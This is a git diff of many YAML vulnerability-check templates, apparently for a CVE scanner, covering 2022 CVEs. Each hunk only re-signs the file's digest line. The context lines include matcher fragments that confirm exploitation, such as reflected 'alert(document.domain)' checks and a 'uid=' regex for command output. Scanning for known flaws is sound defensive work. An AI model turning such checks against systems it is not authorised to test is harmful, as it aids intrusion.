4b0a00483046022100f3d66b1c2596c8c5a60fadca10cf64ba895aabc848caea0bc014a64b5b48e04e022100dc8487b554bee0898f40b7fa22ff85f265af3dd73258ba2ba036e6e3d7ae95b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220508a25e53992f71a0c0e1613f1df75afea7314115bd57f3048e91c9fc36ddf3802207ce3526546e9caca6a5e12a9b26fc0687f38a8f928ff84e751c99d5677ba4114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index 7be33fda23..1124ffaca8 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ee8b205a52bced492c328f502f5f66646e3dcfc8746c220394a9d076b0ea426802204c5a84818d0d4b3d81627a8cfaa815525b65baacb4203a30d3c43e3bba523ff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b51d243c97f21fcb85beb1f317c06aee7975d29df11fb1cee0c2956fe0fd65b02204299ce2ca6106775b89d507ffec1d69bf0c776615de752889c3ebcc81abf06d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 5b826b8261..04519a5b18 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200c9d6acfb71d94e20b45f88ab766c29c605beac4198b24f3a2486aa294bbf94d022100d3974d80370bf8f36c56b11fffc5aea6c327b80fcff210cfb7b3f4694c7c32ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ea88299ec85fb50b4a362a8e064bc821fb7715a7759f1eeca4e1cf413f0660ed022100fe6573babba0d9c0edfa96f41ecf1d52e2520195df629fdc83d76427c3b9eef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index b0872d03ed..b93c5d5cd7 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -59,4 +59,4 @@ http: - "" - "" condition: or -# digest: 4b0a00483046022100dbe0a784dc364f2004d902801a8865e1404676a2a154ddbb9fd205bf80e88703022100eaa496730253c3ef65211f63c10a78342a183a3b5e0331aa3b7eaedb159a56bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c58308205018e15f25ac2f7d5c893f96e4824a583109c18b69b936c1d0a70a2b022071a1f6412c2a7b759bc7b80ca525682bca892b4f239f9c1dd42aa27dafc7221e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index 63dc94b9b3..6dd5baad96 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100983e833283f7fd6a02ca33f09a87d4ba22dcf0def43e996ddf617d3f821aabf20221008e91a6a01bda3f4bb5a4a7a9b861e3e93ef3884f23bb6ff05d775e5c9133659d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d7f00c85b2fc013d012ffbc1aface3dba29af2e1702bddfc66c8cbcdc3352788022100f55effaa808713faa5ad79ed9524db463132d5e31bdde0eba82aeaf965d12818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index 02a14eba93..0db605cff6 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ea0a2eb9b5e2e9e8466b7dcf6040653f31d3c9813c14d7c1e6e0e89d07e17cd02205b74da895572f34a4721c6c494f46762d36cde27b561d40e6f006c22f3c000b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022074bce49d1d622adb10be0856ef209bacb28fb427de7f38f426069ca664b036d9022100b2466c1b44507b4b58e6f7e6ee4ab7221f9307198493e54f23ca95f1fcfc9e73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35653.yaml b/http/cves/2022/CVE-2022-35653.yaml index a438f6fecb..022fbc4de6 100644 --- a/http/cves/2022/CVE-2022-35653.yaml +++ b/http/cves/2022/CVE-2022-35653.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c5a7c45b0e0cfb570d1543f2f0281f300c1c91f2510f8b89e972e743e29ae6a022100cc251c6669c811fa42fccdbec4a7b54b9f795a76fdfb9a6ba7929dc1002aa461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004b941fe0c29e3e5d82693bdb719e8d8bf0d20abade4a23f07f9a6f83c96c49e02201aeae2d265a2fa845153049b513dbfcbef5d317b1d289064871fdd40cc17f5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index 3c15698def..706f623aa0 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009f0bcb9c4ecbc0fa78e6e805c9b0e26a41a09eaf859b80882f02481654f28a0402201349d2904e404382aee64881fe8e567d5b3edccc803710563d16722be50c905a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e6859ca0826caafa4dc545ef1248adebca25f472c0e3188fb46cd23a4dd3bfc0022100ae9f408351c828c91bf99522202d215eabc284c86bcc9abb16c786e316ac0ebc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index d272cad655..95d822f1fc 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -75,4 +75,4 @@ http: regex: - "dt:'(.*?)',cu:" internal: true -# digest: 4a0a00473045022060bba976da8f71ab5494acd05239ea5bcd60e8d7d48b33c3790256e182401eea0221008a17c8f1922d8c7db21f44034d47e17d56215d5e2798dcd9a38bdb3baa3d933b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202cfa133f395dd683e1024de424de18fd3f12ff8a827f399357055226d7b8644c022100b0f39d19405888c00c5f79a616f6d8b3424a5f58b8ddfc5d37ad214eecdb917b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index 40a566c0b7..6200beeadd 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -74,4 +74,4 @@ http: group: 1 regex: - 'uid=.*\(([a-z]+)\):' -# digest: 4a0a004730450220506cf45b2b5772d954db0dbd63474556eecd5d2f1ddf90cd7dc909d28c66b5f1022100b73cbeeb517a8364d784f6d7b66f568a66c936091c7f85bfd7c93fb995501f13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f05b6fa75f5b18f40fc9cc67c652ba6c7601a227fe47e0bb3a03972933cabf30221009e3c19b251fb9154d5ade0ac96346cf96e5f9d320a6b1322a5a54fb104555e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37042.yaml b/http/cves/2022/CVE-2022-37042.yaml index 7f7d5a80b7..e66a2899cb 100644 --- a/http/cves/2022/CVE-2022-37042.yaml +++ b/http/cves/2022/CVE-2022-37042.yaml @@ -56,4 +56,4 @@ http: - 'status_code_2 == 200' - "contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')" condition: and -# digest: 4b0a00483046022100d674c89d1730fe9215d477aae5b18c37b60aad65119e189ce9fd0bf8f6462a6d0221008884f37c0a3f3cb63300ce5e745285b66107303632ed1e90e7f9ca0503c7a9ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220174e125afd24ffd46b83dc8fbd16ba76bac1f9c389dcf41df028a42b438df438022062eb429750f3554a28c017e74167a82a4023aa672bf4059f0bc3e2e444886d8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index 7212ed832a..b22c9cf9a6 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b14d1ff59646fd834c05a7cd02074b73358e57031c4dc3cf6d2a9e8b25360e2e022100ea34de0261aeb90da70d2041ce4b65f0f6485bde8916d29faf4e10c71fac9771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df0431683f7ff338969210c72a2895dd79303bff523433299b1dc2074c65ffe102210086ecf0af9d7d5b544b35d85c2af4279bb4f62ed131ac6bf93e84e32089f02d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index 248176fd84..09f3c6f08e 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022006a89c67e6cc01581132df21cbacbfdb2ea4e0e5372ec7d819b81636f304dc3c022061a6b6551a1fcc31af1f0704085fb7d260457e2c1f949363f00b60a1f058341e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094bc65c10f89d2bb9c87686eba12f012554fc0ce21425c4d59230a1d8de5f4a9022100cf813f36fe3c9da4e06e3a7ee76fc66362ee7b3a792eba20f1c7d6f5abc0c98d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38131.yaml b/http/cves/2022/CVE-2022-38131.yaml index 4677b5aeb0..c7bf808a41 100644 --- a/http/cves/2022/CVE-2022-38131.yaml +++ b/http/cves/2022/CVE-2022-38131.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 307 -# digest: 4a0a00473045022100aed598584561fa1188599f4a3fa2ff5ae9149e94b624fef3be306a7a74429c3f02201c02b4ebc6bfa15076a56527dc53df6e0be1e5d7f890dbc1558b26e30d35059b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200b9d41c0309ab333bc791e17f4889c4b508a20ade256857de387596a939fb4c902200510b2369cd933fdeb6f527cf54398cb913417dac88699d63249c20b88272874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 87cdff6231..910d6cdbc6 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205a8b5827816043b19c9324e87d486532ebbcc543d7160f2c8986cde1890785be022100e3e593508f39a2e68a0461539fec29563ce20c29e83af84f3f45d911acd68a53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220602dde2b93eb0d41d3c031c0120a9007197dfb886c56eb72c39a68e752d55dde022100f6fd085c092dc14047ca0974a626fcb410641ff5f391c3d454c2707f5efd823a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index 5c7395b497..fa85aa016a 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_1, "CRM Perks Forms") && contains(body_2, "")' condition: and -# digest: 4b0a00483046022100eeaaa40af379d77811cc1343094e6b8412719b312bd1cb7561ba293380ed5841022100821277d2e851584fdff4d956aaf6c6cd6f8c9f7094c146c1050f78580eb0b34e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220729431423049e0675d567b6cbd1d77e01b4e70f542ae8a569d9765cf8dcd344b02205d87faab9dfcd79998b0d0e68c7e91eb95180dd93bf447409ae8c7579e50761b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index 2227d45a29..e66c68ee6d 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bf7aa7b1075f1aab17e531e1b41225a71fad097bcb99ec558cf32dc2b93f874d022018e2116bd06db0906028358f5b3cffea31325e0f3a026fd45ab72962edb3625c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a8383f340fa0dfe055b740805fc9006b8240efd45919da33d427bf756f32ea3002202ce22932462286045aba1b3fcbf86f9f3abb7035232fbf32730b0d01b48c2f4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index dfee9546a1..c3317573fc 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210098b22668bcef9575e2cb09011eb79d8e60f2753c0995c8eae79cf90d8f412809022100c8512c11b29dda8b1c3329316c3e58b92f3f533c60353103172d1dae407dec11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b1bc52241353b36e1a5999a82f529fbbc762b7a9979290d5bbe230ab8d331b1102201bfc8ecd065a544dbcd51dd648a5542814bd55243221a48cceccfba368e17784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index 39ef9ee18d..17f9d4d0d6 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100db004d1dd6456c314292879c060fafec50481d06788d0451af16d99de943058b022100bd0e6d12f9231d23edb732e7f0b457c89787c15cdb5474222d768580664b20f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100deb484913d771058cb07f05ff44b039c31713806ae1d7dc76ab917a696784c1602204cc67b35d929a40ecbf2769707cf7c05748309ec523759fa82bd301d0c1751f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml index 84f79c3436..824a6907a9 100644 --- a/http/cves/2022/CVE-2022-3933.yaml +++ b/http/cves/2022/CVE-2022-3933.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "ere_property_gallery")' condition: and -# digest: 4a0a00473045022044c2206c93a3b22c964a8f3cfab1ce953162b9cbe8cb64f06aaf11cda7e315e7022100a7eda42c332ab6fb7ea8c2ce7ab1b485fbe3b1c3affcbea4297ddf74a69c095e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200fe935b7c005247f683b953718e68e4676806de61fba39833160c8503149843f0220541a0e4a4597d27026619f26e233f4d496a8860c45a55e6254286e1975f5b1d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml index ce8a4e4e84..5dbc2c3283 100644 --- a/http/cves/2022/CVE-2022-3934.yaml +++ b/http/cves/2022/CVE-2022-3934.yaml @@ -50,4 +50,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")' condition: and -# digest: 4a0a00473045022003a6c9197d80b5d761304778735b183de807813cdd5ef1230df69be7471a62e9022100cc09bb9e291b45608b6d76757734222882524e2ecdf4c7119a622ebe9bfdc6ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055fba672dad146e93dacb3d50e8711c24f62824a1537c6528e556035e547b531022100c5aff9e112c142313578fb3dfb3657b394dd081730b12452893b6e84b0fa8007:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 94abdbb8a4..a0550b3a6f 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -52,4 +52,4 @@ http: - "status_code == 400" - "len(body) == 0" condition: and -# digest: 490a004630440220012b18b7956245fe4458903b533174bcc146950ad006abe4895c4ae5ac0e58d9022073a0e0aa8ea1b57fd1a25fb11db163ca871070c887d59cbd7c8aae538e159533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c485611836eec10a1ed541a3725bc35ddc5c20287b97f2ac232d2da614d03c202202fe8d887267e1145fd5315a3ce8588e05e684c7f439e5a7ca6ed2bf669c27137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index 8a1274eb2b..6673fdf773 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -86,4 +86,4 @@ http: regex: - var wpdevart.*"ajaxNonce":"(.*?)" internal: true -# digest: 4a0a00473045022029c27225b686c550e2a1939a44fa68c35205530018a95205fca024112dd95dda022100f55ea7accc5bdefb0d6d5ff151c5e1b22a16f65477ff66e57885886e75903986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206624ff96893b99e563ed7e913f0e75dadca668f907e6df1e79304e5ab55b41af02204d1893aa291251d21b535495c2021849fc9174fdc13289d8fb011079eb6dca38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index 6fc769671a..bbf0783c46 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100975c82964db3d61eed4b5b3ee1b3b0b0901132c541255095f198e0195202b106022100c997756328699bd40ef6df39a32954bb7c394c3218bbc6caccfd53779d8badef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203cea582616645262451f278883a52ba23466fd71d17efc23fbe8aa5ee2a16c6a0220761185b2c6e66b8eb362c33c1f84a4517c8a9c07670e4e28002fe0ee4767c1ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index 99145e6283..977beb7f8d 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022020cb5c133e03e9f49432f2a91d059461edb00fee56e5e2ec1cb033d4c91cb6f7022100a65cf38be0eed4e1ad0af73ba7ca1fd588a0e877d2b239eb60b7dbb5319befd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4276486bf740d5acd36f59842a4bb0b0c269c2f35c5b44b7636f342e3f67cea02204698566d89e3bfcb3a4f81b02a07c2ec2552a2b2c88e067bb333d25f7a346cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index 24fedbdf6c..4d2e1d1f67 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100c892477d64e0be35c39a0a85544b84ba19f319780fbe77a13cb30853e88a659f02202bdf2c1f6dcd4aaf9596b027825402f5de7295008b8c026b40f130a50c14c493:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aa89454b284e35f82c58b79db719d9270edf456761c8aa7bded1254e7a8fd8fb022100a95aa00978443217fc6d8c9d178a21856ac5ac6e5aa0dcd44bcfb2ce9448c58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index 44d7324af3..d4dae819da 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -60,4 +60,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "onfocus=\"alert(document.domain)")' condition: and -# digest: 4b0a00483046022100d0f1944ae5a82e79a1db05a0c24f4c2ea9ac7c3e47fe7bc82d53e0226f19b2730221008d473a40591f4d0ada73ff4f654bf66b2988d45d4a12b2ef247e5e22991e3a37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe7ff33760e6216455b976917c3895164eff5585432a53158db6e362b5c59bc702203d624f6051dbcc168fdd190e57fed04454c628d0500d5dffb611d8b5ec17e4ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index ab415c2dbd..2ab8306634 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -81,4 +81,4 @@ http: regex: - 'type="hidden" value="(.*?)">' internal: true -# digest: 4b0a00483046022100c06f735557ba28e9e3e4175cbdc9702df85af7d2a184e4885d6bdd78e10e7648022100fc63ce454d208a9024683a0ae3462b65a906b765e1f84df574689afc3fcf8336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220268a6975a87f86a812533542ac7994169de5175872889d429254a91734af5044022100b472c5440cfea767aec326fbd15a942a4d35efcd9f11e527f167068308b38d39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml index 0a6207336a..e5c85bfa5c 100644 --- a/http/cves/2022/CVE-2022-40359.yaml +++ b/http/cves/2022/CVE-2022-40359.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d1ae755e5df70ae1290afca0905f403639bdac83225a68bcc1d3f5c721ea709c022100c8e6756fb33196000c2a16fbc3a1f170a3034489194322263cfd38374020f1ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220171d85e0f730e64868dee2a05909f6c686e599f48f3696442a181b69884cf50f022100c1f6c50e667cb2eb97f58eadec05e4db8a84fdda96907fa4c22f023609840b63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index f8cd964454..224eae8487 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -65,4 +65,4 @@ http: regex: - '"wpuser_update_setting":"([0-9a-zA-Z]+)"' internal: true -# digest: 4b0a004830460221009faa06fa0f147358586d15b98e679bd9f352202ed619044fa91c0265a6649de8022100908aacb9718503ec4d03e57354650c47f7a419671c8d05db7669f07fcd6286b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200bc446290576844df258d034022250c3aa6e8246bb5a19d65fa51e01ba5b35e4022100fc78eae46cc6546539a10fd2ec8828a404ac6f42e58cd5aed957844879de1ed6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index b0a873058b..38f1381f3f 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' condition: and -# digest: 4b0a00483046022100cadb3ed6f91c746b10eb8672937df5a011b5c8fac33b96132569de1f5632e2bb022100f08941e11ea8a2e58e40d73669ee5b09e28d90022a943a1e23d5446b6ab72f94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100adc5764e0fcc369d16e68be00829b99d4fd95b2241bff1c6ef38c1a561fd9c1c0221008f5d90efe26e0150b8ed5e151209c27ebe6766cc9e70d08983c5696822fa55ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml index 6f3ee7f1b6..1e005b5d4a 100644 --- a/http/cves/2022/CVE-2022-4060.yaml +++ b/http/cves/2022/CVE-2022-4060.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b655c9889755d195fdeaeac75792a423f273c3ce208b38ad57544d44ca78ccde02201ff796c91fb4cf6345ee1f0c954447f9a04af7dba6fdb3815be35839f2c05e48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200654ec12187c127abd7ddbeaaa97db5da699aae212f58f56dbdd9b3c3592da7d02205785dd9471edbb3f65c8fc27fb262bbb41ca3ef683dd42409e9fa2622df41348:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 1dd30570c2..892680e979 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008d04181f5bd953e4fd3a432b3593d61c11c00efaebf12e70cf09986277e0172a022062fe3edc0c646771920ccfb249e24cd8bc915a0620d6a4969fb486307157ca80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001c30dda208f23934117d6648b68a7cbc6063bd9487648f9d3cb3f954c8fb469022100eb1c85cee64fa01d404510e98f5b9c0975e3511b85a8e515435a7dce0084aef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40684.yaml b/http/cves/2022/CVE-2022-40684.yaml index 04902b17dc..e8e301003a 100644 --- a/http/cves/2022/CVE-2022-40684.yaml +++ b/http/cves/2022/CVE-2022-40684.yaml @@ -67,4 +67,4 @@ http: - Invalid SSH public key. - cli_error condition: and -# digest: 4b0a00483046022100cb3a65b9859d298e1c1a42077acfbb1c6584b4553778334201bb1d81c1255c8502210090905f405a2ad89ee66c2300ac407fe5d3b2c76e76370baf645d14e22e5c699a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ecd342ecd1ddb863f225cc6136e9bc2bee1dd54adfdfe4bd199aae259088ce9902204ae159dde8793d19d05e1809870cd28bb6da2e7a9ce835bdb59a391acfd4000e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index 091199576c..5cff18afee 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fd1401b9eb51c698c8adf00a99a5d3487f1c20d57b382d6a18aea6ef96a4147d022100c06f9ac4250e2c49938ba90574b9aa08d642794c5713e1780a234e400907d09e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2aad06ddab3ccd6e666e1cc53a8974249101d2a25b364fb4b96543189e71c450220673c9fddd115564cbbe4faa07d9de703be2cd6af8eede2a57e4408e9ba10d5af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index a97e64ad66..0132443048 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207750e7d19ca73e36d20e71bd008c1c34430e8e72a8b1c8017fbe1817f33d1c1c02201f1beb16589386c2c530db651a39867b6b291e33d3edabda342b583f61767c51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022002d0aafae336d011a0a74b01352143f57a21e65003ac86e0ea9563934522d3c80220494bc3ac1854a6da8d5cc61b7c8b2b0158429cb26e83ab3f628b90e2dfb751a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index f4fcaa036e..c6161c4c1e 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "\"status\":200") && contains(body, "{\"html\":")' condition: and -# digest: 